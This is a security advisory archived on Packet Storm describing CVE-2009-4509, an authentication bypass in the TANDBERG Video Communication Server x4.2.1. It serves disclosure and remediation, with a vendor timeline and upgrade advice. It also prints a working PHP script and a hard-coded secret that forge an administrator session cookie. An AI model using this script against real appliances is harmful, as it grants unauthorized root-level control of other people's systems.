exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Tandberg VCS Authentication Bypass

Tandberg VCS Authentication Bypass
Posted Apr 12, 2010
Authored by Timothy D. Morgan | Site vsecurity.com

Virtual Security Research, LLC. Security Advisory - On December 2nd, VSR identified an authentication bypass vulnerability in TANDBERG's Video Communication Server, firmware version x4.2.1. This vulnerability allows for the complete bypass of authentication in the administrative web console. Since this web interface can be used to execute arbitrary code on the appliance as root (via software updates), the severity is considered critical.

tags | advisory, web, arbitrary, root, bypass
advisories | CVE-2009-4509
SHA-256 | db51c425156ad6e9f3fa40fb9a1383e98edfded1cb0710c6c58c4a658f0b3a0b

Tandberg VCS Authentication Bypass

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


Virtual Security Research, LLC.
http://www.vsecurity.com/
Security Advisory


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Advisory Name: TANDBERG Video Communication Server Authentication Bypass
Release Date: 2010-04-09
Application: Video Communication Server (VCS)
Versions: x4.2.1 and possibly earlier
Severity: Critical
Discovered by: Jon Hart and Timothy D. Morgan
Advisory by: Timothy D. Morgan <tmorgan (a) vsecurity . com>
Vendor Status: Update released (without security advisory) on October 9, 2009
CVE Candidate: CVE-2009-4509
Reference: http://www.vsecurity.com/resources/advisory/20100409-1/

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


Product Description
- -------------------
- From [1]:

"The Video Communication Server (VCS) is an integral part of the TANDBERG
Total Solution and is the center of the video communications network,
connecting the benefits of video conferencing and telepresence to other
communications environments including unified communications and IP Telephony
networks."


Vulnerability Overview
- ----------------------
On December 2nd, VSR identified an authentication bypass vulnerability in
TANDBERG's Video Communication Server, firmware version x4.2.1. This
vulnerability allows for the complete bypass of authentication in the
administrative web console. Since this web interface can be used to execute
arbitrary code on the appliance as root (via software updates), the severity is
considered critical.


Product Background
- ------------------
The TANDBERG Video Communication Server is a Linux-based appliance which
supports the interoperation of a plethora of video and voice communications
devices. The VCS provides a web-based management interface implemented in PHP
which allows administrators to perform a wide variety of actions, including
configuration of the device, management of user accounts, firmware updates,
along with number of other items.


Vulnerability Details
- ---------------------
The TANDBERG VCS web management interface utilizes custom cookies for the
purpose of session management. In version x4.2.1 of the appliance firmware
(and possibly earlier versions), it is possible to forge session cookies with
relatively little knowledge of the appliance's configuration.

The vulnerability lies in the files located at the following paths:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php

Routines in these files generate user session cookies in roughly the following
way:

SECRET = SERVER_ADDRESS + STATIC_VALUE
HASH = md5(USERNAME + SECRET + CLIENT_ADDRESS + CURRENT_TIME)
COOKIE = USERNAME + ACCESS_RIGHTS + CLIENT_ADDRESS + CURRENT_TIME + HASH

In the above pseudocode, the SERVER_ADDRESS represents the VCS system's IP
address, STATIC_VALUE represents a fixed string which is hard-coded into the
application source, USERNAME is the authenticated user name, CLIENT_ADDRESS is
the IP address of the user's system, CURRENT_TIME is a simple UNIX time stamp,
and ACCESS_RIGHTS is an integer denoting the level of access assigned to the
user.

Note, that none of the information above is difficult to guess. Any owner of a
TANDBERG VCS would have access to the STATIC_VALUE (and in fact, this value is
contained in the firmware updates[2]). All TANDBERG appliances have a default
user name of "admin" which has full privileges. Therefore, it is possible with
a simple PHP script to forge new cookies and access the administrative
interface:

// NOTE: Portions of the following code are Copyright (C) 2009 TANDBERG //
function objectToCookie($obj)
{
$cookie = serialize($obj);
$cookie = gzcompress($cookie);
$cookie = base64_encode($cookie);
return $cookie;
}

function genCookie($server_addr, $remote_addr)
{
$user_name = "root";
$secret = $server_addr . "139EF012B6A714A3BE0A867616C7F8";
$time = time()+24*60*60;
$id_hash = md5($user_name . $secret . $remote_addr . $time);
$access = 1; // ReadWrite

$login_cookie =
array( "user_name" => $user_name,
"access" => $access,
"id_hash" => $id_hash,
"ip" => $remote_addr,
"time" => $time
);

return objectToCookie($login_cookie);
}

print "Cookie: tandberg_login="
. urlencode(genCookie("{{SERVER_IP}}", "{{CLIENT_IP}}"))
. "\n";
// end of script //


TANDBERG released firmware version x4.3.0 which corrects this issue on
October 9, 2009 (prior to discovery of the vulnerability by VSR). The release
notes[3] for this updated version contain a description of the issue:

"Improved the security of the web interface to ensure that the system will not,
under any circumstances, allow an authenticated user to escalate their session
to more advanced privileges [Ref # 65050]."

However, VSR felt this does not adequately describe the problem. Clearly, as
the above exploit and pseudocode demonstrate, it would be possible to alter an
existing login session cookie to provide elevated "access" values without
updating the MD5 hash, since this value isn't included when the hash is
generated. However, the larger issue is that cookies can be forged from scratch
without an existing session.

In addition to this lack of clarity, no apparent security advisory for this
issue was released to the public via the normal channels (nor was it recorded in
the CVE as of this writing). Therefore, VSR felt it is in the public interest to
shed further light on the problem.



Versions Affected
- -----------------
VSR has successfully exploited this issue in version x4.2.1. Earlier versions
may also be affected. Version x4.3.0 corrects the problem through use of a
random secret and the inclusion of the "access" value in the hash.


Vendor Response
- ---------------
The following timeline details TANDBERG's response to the reported issue:

2009-12-09 Preliminary notice to TANDBERG. TANDBERG responded immediately.

2009-12-22 VSR provided TANDBERG a draft advisory.

2009-12-28 TANDBERG confirmed that this issue was corrected in version x4.3.

2010-04-07 TANDBERG VCS firmware version x5.1.1 released [2] which corrected
other flaws identified by VSR.

2010-04-09 VSR advisory released.



Recommendation
- --------------
Upgrade to firmware version x4.3.0 (or newer) as soon as possible. If this is
not immediately possible, temporary mitigation could be achieved by changing
the "$this->secret" constant in the following files to something unpredictable:
/tandberg/web/lib/secure.php
/tandberg/web/user/lib/secure.php

Note that other vulnerabilities were identified in firmware versions prior to
x5.1.1. Therefore, upgrading to this version is recommended. See CVE-2009-4510
and CVE-2009-4511 for more information.


Common Vulnerabilities and Exposures (CVE) Information
- ------------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned
the number CVE-2009-4509 to this issue. This is a candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.


Acknowledgements
- ----------------
Thanks to TANDBERG for the quick initial response and cooperation.


- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

References:

1. TANDBERG - Video Communication Server
http://www.tandberg.com/video-conferencing-network-infrastructure/video-communication-server.jsp

2. TANDBERG VCS Firmware Downloads
http://ftp.tandberg.com/pub/software/vcs/

3. TANDBERG VCS Version x4 Software Release Notes
http://ftp.tandberg.com/pub/software/vcs/TANDBERG%20Video%20Communication%20Server%20Software%20Release%20Notes%20(X4).pdf

- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Copyright 2009,2010 Virtual Security Research, LLC. All rights reserved.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iD8DBQFLv/kqQ1RSUNR+T+gRAjcpAKCg8fsgBxnaoqPrGMq/5eVow9AbzACgjvoN
5t0z+HmLNIzNIzv0Un+KqiE=
=vj2C
-----END PGP SIGNATURE-----

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close